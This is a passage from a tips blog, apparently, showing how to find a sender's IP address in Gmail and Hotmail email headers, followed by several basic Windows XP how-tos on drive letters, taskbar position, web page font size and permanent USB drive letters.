Look for Received: from followed by the IP address between square brackets [ ].

Here, it is 202.65.138.109.
That is be the IP address of the sender!

6. Track the IP address of the sender


Finding IP address in Hotmail



1. Log into your Hotmail account with your username and password.
2. Click on the Mail tab on the top.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed.
To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on Mail Display Settings
* In Message Headers, make sure Advanced option is checked
* Click on Ok button
* Go back to the mails and open that mail

5. If you find a header with X-Originating-IP: followed by an IP address,
that is the sender's IP address
Hotmail headers : name ,In this case the IP address of the sender is [68.34.60.59].
Jump to step 9.
6. If you find a header with Received: from followed by a Gmail proxy like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [69.140.7.58]. Jump to step 9.
7. Or else if you have headers like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [61.83.145.129] (Spam mail). Jump to step 9.
8. * If you have multiple Received: from headers, eliminate the ones that have proxy.
anyknownserver.com.
9. Track the IP address of the sender

Labels: , , , , ,

Change Drive Letters in Windows XP

When you add drives to your computer, such as an extra hard drive, a CD drive, or a storage device that corresponds to a drive,Windows automatically assigns letters to the drives. However, this assignment might not suit your system; for example, you might have mapped a network drive to the same letters that Windows assigns to a new drive. When you want to change drive letters, follow these steps:

· Right-click My Computer, and then click Manage.

· Under Computer Management, click Disk Management. In the right pane, you'll see your drives listed. CD-ROM drives are listed at the bottom of the pane.

· Right-click the drive or device you want to change, and then click Change Drive Letter and Paths.

· Click Change, click Assign the following drive letter, click the drive letter you want to assign, and then click OK

Labels: ,

Move taskbars

If you want to change the position of Taskbar then go for it by simply following these steps...

Right click on taskbar (if it is locked than click on lock taskbar to unlock it) drag taskbar to its new location then again locked it by right click on it.

Labels: , ,

Change Web Page Font Size on the Fly

If your mouse contains a wheel for scrolling, you can change font size on the fly when viewing a Web page. To do so:

Press and hold Ctrl. Scroll down (towards yourself) to enlarge the font size. Scroll up (away from yourself) to reduce the font size.

You might find it useful to reduce font size when printing a Web page, so that you can fit more content on the page.

Labels: , ,

Assign Permanent Letter to USB drive

If you have multiple pen drives you might have noticed that every time you put in your drive it will be assigned a different drive letter. This can be very annoying, when you trying to open files of pendrive from some software as recent drive letter is changed you have to change address again. So now here is one solution for this problem assign permanent letter to your USB pendrive. Its very simple just follow given steps:

1). Go to Start and then Run.

2). Type mmc in the box and press enter.
(mmc is microsoft console management)

3). Now in console window click on new option in file.

4). Now select File -> Add/Remove Snap-in.

5). In add and remove snaps in window select Disk Management and then click on Add.

6). In disk management window, select This computer and then click on Finish.


7). Now press OK on the Add or Remove snap-ins screen.

8). Now select Disk Management from the left menu.

9).You will now see all of your drives/partitions in the right hand side panel.

10). Right click the USB drive you want to assign a permanent letter to and select Change Drive Letter and Paths.

11). Click on Change.



12). Select a permanent letter.


13). Click OK.

14). It will warn you about making the change - there is little chance programs you use will be affected by this. If they will, you will probably already be aware of this so don’t worry.

15). The final step is to select File > Save and save the file in the default directory. Close the Console and you are done.

Its done..

Labels: , , ,